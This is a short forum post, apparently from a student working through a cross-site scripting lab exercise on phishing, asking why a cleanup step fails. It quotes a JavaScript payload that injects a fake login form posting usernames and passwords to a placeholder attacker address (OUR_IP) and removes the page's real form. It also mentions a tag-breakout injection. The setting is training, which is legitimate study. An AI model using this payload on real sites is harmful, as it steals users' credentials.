While doing the exercise and following along, in the “Login For Injection” and “Cleaning Up” subsection, the following does not get rid of the URL entry form and I am unsure as to how to fix it to get rid of the URL form.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
I was able to do the login form injection by modifying the method using '> to comment out the img tag and then just injecting the raw HTML instead of minifying it and commenting out the end with <!–. I feel like minifying it should make it easier, and would like to understand how to do it using that method. Already tried googling many things. Might need to just take a break to let it all sink in. Thanks for any guidance you can provide.